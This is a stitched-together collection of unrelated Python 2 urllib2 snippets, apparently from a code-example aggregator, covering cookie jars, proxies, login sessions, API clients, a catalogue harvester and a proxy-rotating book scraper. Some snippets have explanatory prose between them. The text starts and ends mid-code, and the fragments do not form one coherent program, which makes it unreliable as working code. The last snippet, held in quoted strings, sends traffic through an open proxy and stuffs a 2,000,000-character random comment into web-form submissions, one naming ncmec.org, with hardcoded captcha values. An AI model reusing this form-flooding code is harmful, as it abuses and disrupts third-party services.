(captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar) # if captcha_challenge: # post=post.replace('$LiveStreamRecaptcha','&manual_recaptcha_challenge_field='+captcha_challenge+'&recaptcha_response_field='+catpcha_word+'&id='+idfield) link = '' try: if post: response = urllib2.urlopen(req, post) else: response = urllib2.urlopen(req) if response.info().get('Content-Encoding') == 'gzip': from StringIO import StringIO import gzip buf = StringIO(response.read()) f = gzip.GzipFile(fileobj=buf) link = f.read() else: link = response.read() if 'proxy' in m and not current_proxies is None: urllib2.install_opener( urllib2.build_opener(current_proxies)) link = javascriptUnEscape(link) #print repr(link) #print link This just print whole webpage in LOG if 'includeheaders' in m: #link+=str(response.headers.get('Set-Cookie')) link += '$$HEADERS_START$$:' for b in response.headers: link += b + ':' + response.headers.get( b) + '\n' link += '$$HEADERS_END$$:' # print link response.close() except: pass cachedPages[m['page']] = link #print link #print 'store link for',m['page'],forCookieJarOnly if forCookieJarOnly: return cookieJar # do nothing elif m['page'] and not m['page'].startswith('http'): if m['page'].startswith('$pyFunction:'): val = doEval(m['page'].split('$pyFunction:')[1], '', cookieJar, m) if forCookieJarOnly: return cookieJar # do nothing link = val link = javascriptUnEscape(link) else: link = m['page'] if '$doregex' in m['expres']: m['expres'] = getRegexParsed(regexs, m['expres'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if not m['expres'] == '': #print 'doing it ',m['expres'] if '$LiveStreamCaptcha' in m['expres']: val = askCaptcha(m, link, cookieJar) #print 'url and val',url,val url = url.replace("$doregex[" + k + "]", val) elif m['expres'].startswith( '$pyFunction:') or '#$pyFunction' in m['expres']: #print 'expeeeeeeeeeeeeeeeeeee',m['expres'] val = '' if m['expres'].startswith('$pyFunction:'): val = doEval(m['expres'].split('$pyFunction:')[1], link, cookieJar, m) else: val = doEvalFunction(m['expres'], link, cookieJar, m) if 'ActivateWindow' in m['expres']: return if forCookieJarOnly: return cookieJar # do nothing if 'listrepeat' in m: listrepeat = m['listrepeat'] return listrepeat, eval(val), m, regexs, cookieJar try: url = url.replace(u"$doregex[" + k + "]", val) except: url = url.replace("$doregex[" + k + "]", val.decode("utf-8")) else: if 'listrepeat' in m: listrepeat = m['listrepeat'] ret = re.findall(m['expres'], link) return listrepeat, ret, m, regexs val = '' if not link == '': #print 'link',link reg = re.compile(m['expres']).search(link) try: val = reg.group(1).strip() except: traceback.print_exc() elif m['page'] == '' or m['page'] == None: val = m['expres'] if rawPost: # print 'rawpost' val = urllib.quote_plus(val) if 'htmlunescape' in m: #val=urllib.unquote_plus(val) import HTMLParser val = HTMLParser.HTMLParser().unescape(val) try: url = url.replace("$doregex[" + k + "]", val) except: url = url.replace("$doregex[" + k + "]", val.decode("utf-8")) #print 'ur',url #return val else: url = url.replace("$doregex[" + k + "]", '') if '$epoctime$' in url: url = url.replace('$epoctime$', getEpocTime()) if '$epoctime2$' in url: url = url.replace('$epoctime2$', getEpocTime2()) if '$GUID$' in url: import uuid url = url.replace('$GUID$', str(uuid.uuid1()).upper()) if '$get_cookies$' in url: url = url.replace('$get_cookies$', getCookiesString(cookieJar)) if recursiveCall: return url #print 'final url',repr(url) if url == "": return else: return url, 
setresolved
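The appendcookie branch of the second getRegexParsed() builds cookielib.Cookie objects by hand and pushes them into the jar before the opener is created. A minimal sketch of that pattern, assuming 'domain:name=value' pairs joined by ';' as in the original (add_cookies is an illustrative name):

import cookielib

def add_cookies(cookie_jar, pairs):
    # pairs look like "example.com:sessionid=abc123;example.com:lang=en"
    for item in pairs.split(';'):
        left, value = item.split('=')
        domain, name = left.strip().split(':')
        ck = cookielib.Cookie(
            version=0, name=name, value=value,
            port=None, port_specified=False,
            domain=domain, domain_specified=False, domain_initial_dot=False,
            path='/', path_specified=True,
            secure=False, expires=None, discard=True,
            comment=None, comment_url=None,
            rest={'HttpOnly': None}, rfc2109=False)
        cookie_jar.set_cookie(ck)

# usage: jar = cookielib.LWPCookieJar(); add_cookies(jar, "example.com:sessionid=abc123")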
def __init__(self): # save cookies self.cj = cookielib.LWPCookieJar() cookie_support = urllib2.HTTPCookieProcessor(self.cj) opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler) urllib2.install_opener(opener)
def open_packet_log(): httpHandler = urllib2.HTTPHandler(debuglevel=1) httpsHandler = urllib2.HTTPSHandler(debuglevel=1) opener = urllib2.build_opener(httpHandler, httpsHandler) urllib2.install_opener(opener) pass
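install_opener() with debuglevel=1, as above, turns on httplib wire logging for every subsequent urllib2.urlopen() call in the process. If the logging should only apply to selected requests, a non-global variant is to keep the opener local (a sketch, not from the original code):

import urllib2

def fetch_with_wire_log(url):
    # debuglevel=1 makes httplib print request and response headers to stdout
    opener = urllib2.build_opener(
        urllib2.HTTPHandler(debuglevel=1),
        urllib2.HTTPSHandler(debuglevel=1))
    # opener.open() keeps the debug output scoped to this call only
    return opener.open(url).read()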
def start(args): """Login and session handler """ # create cookiejar args._cj = LWPCookieJar() # lets urllib handle cookies opener = build_opener(HTTPCookieProcessor(args._cj)) opener.addheaders = [("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"), ("Accept-Encoding", "identity"), ("Accept", "*/*"), ("Content-Type", "application/x-www-form-urlencoded")] install_opener(opener) # load cookies try: args._cj.load(getCookiePath(args), ignore_discard=True) except IOError: # cookie file does not exist pass # get login informations username = args._addon.getSetting("crunchyroll_username") password = args._addon.getSetting("crunchyroll_password") # session management if not (args._session_id and args._auth_token): # create new session payload = {"device_id": args._device_id, "device_type": API.DEVICE, "access_token": API.TOKEN} req = request(args, "start_session", payload, True) # check for error if req["error"]: return False args._session_id = req["data"]["session_id"] # make login payload = {"password": password, "account": username} req = request(args, "login", payload, True) # check for error if req["error"]: return False args._auth_token = req["data"]["auth"] if not getattr(args, "_session_restart", False): pass else: # restart session payload = {"device_id": args._device_id, "device_type": API.DEVICE, "access_token": API.TOKEN, "auth": args._auth_token} req = request(args, "start_session", payload, True) # check for error if req["error"]: destroy(args) return False args._session_id = req["data"]["session_id"] args._auth_token = req["data"]["auth"] args._session_restart = False return True
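start() above keeps the session alive by loading an LWPCookieJar from disk and letting the globally installed opener update it on every request. A minimal sketch of that load/install/save cycle, with a placeholder cookie path:

from cookielib import LWPCookieJar
from urllib2 import HTTPCookieProcessor, build_opener, install_opener

def make_session(cookie_path="/tmp/session.lwp"):
    cj = LWPCookieJar()
    try:
        # ignore_discard keeps session cookies that would otherwise be dropped on load
        cj.load(cookie_path, ignore_discard=True)
    except IOError:
        pass  # first run: no cookie file yet
    install_opener(build_opener(HTTPCookieProcessor(cj)))
    return cj

def save_session(cj, cookie_path="/tmp/session.lwp"):
    cj.save(cookie_path, ignore_discard=True)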
def fetch_shims(): """ Download shim files from remote server """ import urllib2 attempts = 0 shims = iter(( "operaextensions_background.js", "operaextensions_popup.js", "operaextensions_injectedscript.js", )) shim_dir = os.path.join(shim_fs_path, shim_dirname) shim = next(shims) url = shim_fetch_from + shim while attempts < 10: attempts += 1 try: res = urllib2.urlopen(url) if res.code == 200: try: if not os.path.exists(shim_dir): os.mkdir(shim_dir) elif os.path.isdir(shim_dir): fh = open(os.path.join(shim_dir, shim), 'w') fh.write(res.read()) fh.close() except Exception as e: sys.exit("ERROR: Unable to fetch shim files from " + url + "\nException was :" + str(e)) else: if debug: print(('Response:', res.code)) try: shim = next(shims) except StopIteration: break url = shim_fetch_from + shim except urllib2.HTTPError as ex: if ex.code == 401: if debug: print(('HTTP Authentication required:', ex.code, ex.msg, ex.hdrs)) auth_type = ex.hdrs["WWW-Authenticate"].split()[0] realm = ex.hdrs["WWW-Authenticate"].split('=')[1] realm = realm.strip('"') if auth_type == "Basic": auth_handler = urllib2.HTTPBasicAuthHandler() print("Basic auth: Realm: ", realm) print("Enter username:"******"\n") print("Enter password:"******"\n") auth_handler.add_password(realm=realm, uri=shim_fetch_from, user=usr, passwd=pwd) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) continue else: print(('Threw :', ex, ' when fetching ', url))
def set_proxy(): proxy = urllib2.ProxyHandler({'http':'wwwcache.open.ac.uk:80', 'https': 'wwwcache.open.ac.uk:80'}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener)
def send(self, method="GET", path=None, args=None, data=None, auth=False): """ Send a request to the Wrike API @param method: the HTTP method @param path: the path relative to the repository URL @param data: the data to send @param auth: this is an authorization request """ repository = self.repository # Request URL api = "oauth2/token" if auth else "api/v3" url = "/".join((repository.url.rstrip("/"), api)) if path: url = "/".join((url, path.lstrip("/"))) if args: url = "?".join((url, urllib.urlencode(args))) # Create the request req = urllib2.Request(url=url) handlers = [] if not auth: # Install access token header access_token = self.access_token if not access_token: message = "Authorization failed: no access token" current.log.error(message) return None, message req.add_header("Authorization", "%s %s" % (self.token_type, access_token)) # JSONify request data request_data = json.dumps(data) if data else "" if request_data: req.add_header("Content-Type", "application/json") else: # URL-encode request data for auth request_data = urllib.urlencode(data) if data else "" # Indicate that we expect JSON response req.add_header("Accept", "application/json") # Proxy handling config = repository.config proxy = repository.proxy or config.proxy or None if proxy: current.log.debug("using proxy=%s" % proxy) proxy_handler = urllib2.ProxyHandler({"https": proxy}) handlers.append(proxy_handler) # Install all handlers if handlers: opener = urllib2.build_opener(*handlers) urllib2.install_opener(opener) # Execute the request response = None message = None try: if method == "POST": f = urllib2.urlopen(req, data=request_data) else: f = urllib2.urlopen(req) except urllib2.HTTPError, e: message = "HTTP %s: %s" % (e.code, e.reason)
if options.username: usr=options.username if options.password: pw=options.password else: try: pw=os.environ['ICO_PW'] except: print("Please specify your ICO password") pw=raw_input() password_manager.add_password(None, options.url, usr, pw) auth = urllib2.HTTPBasicAuthHandler(password_manager) # create an authentication handler opener = urllib2.build_opener(auth) # create an opener with the authentication handler urllib2.install_opener(opener) # install the opener... action=options.action.lower()[0] ICOType=options.itemtype.lower()[0] if ICOType == 'c': if action == 'l': url="{0}/orchestrator/v2/categories?_limit={1}".format(options.url, options.list_limit) request = urllib2.Request(url) handler = urllib2.urlopen(request) j=json.loads(handler.read()) if options.debug: print(formatted(j)) cats={} for cat in j['items']:
def setup_cookie(): cj = cookielib.CookieJar(); opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)); urllib2.install_opener(opener);
def main(): # Connection variables csw_url = 'csw.open.canada.ca/geonetwork/srv/csw' csw_user = None csw_passwd = None proxy_protocol = None proxy_url = None proxy_user = None proxy_passwd = None records_per_request = 10 # Or read from a .ini file harvester_file = 'config/harvester.ini' if os.path.isfile(harvester_file): from ConfigParser import ConfigParser ini_config = ConfigParser() ini_config.read(harvester_file) csw_url = ini_config.get('csw', 'url') # Get configuration options if ini_config.has_option('csw', 'username'): csw_user = ini_config.get('csw', 'username') csw_passwd = ini_config.get('csw', 'password') if ini_config.has_option('proxy', 'protocol'): proxy_protocol = ini_config.get('proxy', 'protocol') if ini_config.has_option('proxy', 'url'): proxy_url = ini_config.get('proxy', 'url') if ini_config.has_option('proxy', 'username'): proxy_user = ini_config.get('proxy', 'username') proxy_passwd = ini_config.get('proxy', 'password') if ini_config.has_option('processing', 'records_per_request'): records_per_request = int( ini_config.get('processing', 'records_per_request')) if ini_config.has_option('processing', 'start_date'): start_date = ini_config.get('processing', 'start_date') # If your supplying a proxy if proxy_url: # And your using authentication if proxy_user and proxy_passwd: password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() password_mgr.add_password(None, proxy_url, proxy_user, proxy_passwd) proxy_auth_handler = urllib2.ProxyBasicAuthHandler(password_mgr) # or even if your not else: proxy_auth_handler = urllib2.ProxyHandler( {proxy_protocol: proxy_url}) opener = urllib2.build_opener(proxy_auth_handler) urllib2.install_opener(opener) # Fetch the data # csw = CatalogueServiceWeb( # 'https://*****:*****@csw_url/geonetwork/srv/csw') if csw_user and csw_passwd: csw = CatalogueServiceWeb('https://' + csw_url, username=csw_user, password=csw_passwd, timeout=20) else: csw = CatalogueServiceWeb('https://' + csw_url, timeout=20, skip_caps=True) request_template = """<?xml version="1.0"?> <csw:GetRecords xmlns:csw="http://www.opengis.net/cat/csw/2.0.2" service="CSW" version="2.0.2" resultType="results" outputSchema="csw:IsoRecord" maxRecords="%d" startPosition="%d" > <csw:Query typeNames="gmd:MD_Metadata"> <csw:ElementSetName>full</csw:ElementSetName> <csw:Constraint version="1.1.0"> <Filter xmlns="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml"> <PropertyIsGreaterThanOrEqualTo> <PropertyName>Modified</PropertyName> <Literal>%s</Literal> </PropertyIsGreaterThanOrEqualTo> </Filter> </csw:Constraint> </csw:Query> </csw:GetRecords> """ # Is there a specified start date if arguments['-f']: start_date = arguments['-f'] active_page = 0 next_record = 1 request_another = True while request_another: request_another = False # Filter records into latest updates # # Sorry Tom K., we'll be more modern ASAWC. # For now it's good ol' Kitchen Sink # # from owslib.fes import PropertyIsGreaterThanOrEqualTo # modified = PropertyIsGreaterThanOrEqualTo( # 'apiso:Modified', # '2015-04-04' # ) # csw.getrecords2(constraints=[modified]) # # Kitchen Sink is the valid HNAP, we need HNAP for R1 to debug issues # This filter was supplied by EC, the CSW service technical lead current_request = request_template % (records_per_request, next_record, start_date) # (active_page*records_per_request)+1 csw.getrecords2(format='xml', xml=current_request) active_page += 1 # Identify if we need to continue this. 
records_root = ("/csw:GetRecordsResponse") # Read the file, should be a streamed input in the future root = etree.XML(csw.response) # Parse the root and itterate over each record records = fetchXMLArray(root, records_root) timestamp = fetchXMLAttribute(records[0], "csw:SearchStatus", "timestamp")[0] number_of_records_matched = int( fetchXMLAttribute(records[0], "csw:SearchResults", "numberOfRecordsMatched")[0]) number_of_records_returned = int( fetchXMLAttribute(records[0], "csw:SearchResults", "numberOfRecordsReturned")[0]) next_record = int( fetchXMLAttribute(records[0], "csw:SearchResults", "nextRecord")[0]) if next_record > number_of_records_matched or next_record == 0: pass else: request_another = True # When we move to Tom K's filter we can use results in an R2 unified # harvester # print csw.results # for rec in csw.records: # print '* '+csw.records[rec].title # Till then we need to collect and dump the response from the CSW # No use minimizing the XML to try to create a XML Lines file as the # data has carriage returns. # parser = etree.XMLParser(remove_blank_text=True) # elem = etree.XML(csw.response, parser=parser) # print etree.tostring(elem) # Output the harvested page print csw.response
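The paging above is driven by nextRecord in the CSW response: another GetRecords request is issued until nextRecord is 0 or points past numberOfRecordsMatched. A compact sketch of just that decision loop, where fetch_page is an illustrative stand-in for the csw.getrecords2() call plus the attribute extraction:

def harvest_all(fetch_page):
    # fetch_page(start_position) is assumed to return
    # (number_of_records_matched, next_record, response_payload)
    next_record = 1
    pages = []
    while True:
        matched, next_record, payload = fetch_page(next_record)
        pages.append(payload)
        # the CSW signals completion with nextRecord == 0 or one past the match count
        if next_record == 0 or next_record > matched:
            break
    return pages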
def install_proxy(proxy): print proxy opener = urllib2.build_opener(urllib2.ProxyHandler({'http': proxy}), urllib2.HTTPHandler(debuglevel=1)) urllib2.install_opener(opener) print('Install Proxy Done')
def book_spider(book_tag): page_num = 0 book_list = [] try_times = 0 while (1): url = 'http://www.douban.com/tag/' + urllib.quote( book_tag) + '/book?start=' + str(page_num * 15) time.sleep(np.random.rand() * 5) try: random_proxy = random.choice(proxys) proxy_support = urllib2.ProxyHandler({"http": random_proxy}) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) plain_text = urllib2.urlopen(url) except (urllib2.HTTPError, urllib2.URLError), e: print e continue #try: #req = urllib2.Request(url,headers = hds[page_num%len(hds)]) #source_code = urllib2.urlopen(req).read() #plain_text = str(source_code) #except(urllib2.HTTPError,urllib2.URLError),e: #print e #continue soup = BeautifulSoup(plain_text) list_soup = soup.find('div', {'class': 'mod book-list'}) try_times += 1 if list_soup == None and try_times < 10: continue elif list_soup == None or len(list_soup) < 1: break for book_info in list_soup.findAll('dd'): title = book_info.find('a', {'class': 'title'}).string.strip() desc = book_info.find('div', {'class': 'desc'}).string.strip() desc_list = desc.split('/') book_url = book_info.find('a', {'class': 'title'}).get('href') try: author_info = '作者/译者:' + '/'.join(desc_list[0:-3]) except: author_info = '作者/译者:暂无' try: pub_info = "出版信息:" + "/".join(desc_list[-3:]) except: pub_info = '出版信息:暂无' try: rating = book_info.find('span', { 'class': 'rating_num' }).string.strip() except: rating = '0.0' try: people_num = get_people_num(book_url) people_num = people_num.strip('人物评价') except: people_num = '0' book_list.append( [title, rating, people_num, author_info, pub_info]) try_times = 0 page_num += 1 print 'Downloading Information From Page %d' % page_num
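book_spider() above re-installs a ProxyHandler with a randomly chosen proxy before each page fetch. A minimal sketch of that rotation kept local to the call, so global opener state is not mutated between requests (the proxy list is a placeholder):

import random
import urllib2

PROXIES = ["10.0.0.1:8080", "10.0.0.2:8080"]  # placeholder proxy pool

def fetch_via_random_proxy(url, timeout=20):
    proxy = random.choice(PROXIES)
    opener = urllib2.build_opener(urllib2.ProxyHandler({"http": proxy}))
    # a per-call opener avoids mutating global state between threads/calls
    return opener.open(url, timeout=timeout).read()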
"submitted[email_address]" : "*****@*****.**", "submitted[phone_number]" : "*****@*****.**", "submitted[comment]" : big, "details[sid]" : '', "details[page_num]" : 1, "details[page_count]" : 1, "details[finished]" : 0, "form_build_id" : "form-Wh5QUVUNov9DMh-a57x0lfeB5mKYJeuiAYDZrlO1yh4", "form_id" : "webform_client_form_1", "captcha_sid": 421933, "captcha_token" : "cd93ba2b98de546c744526b83fd8b3e5", "captcha_response" : "Zh9CR", "op" : "Send" ''' '''proxy = urllib2.ProxyHandler({'http': '119.148.9.130:8080'}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) lis = list(ascii_lowercase) big = ''.join(choice(lis) for _ in xrange(2000000)) data = urllib.urlencode({ "LanguageId":"en_US", "_01_name":"hgfh", "_02_email":"*****@*****.**", "_03_comments": big, "action":"sendEmailReport", "cc":"", "fromDomain":"ncmec.org", "fromName":"servlet", "mailtoDomain":"ncmec.org",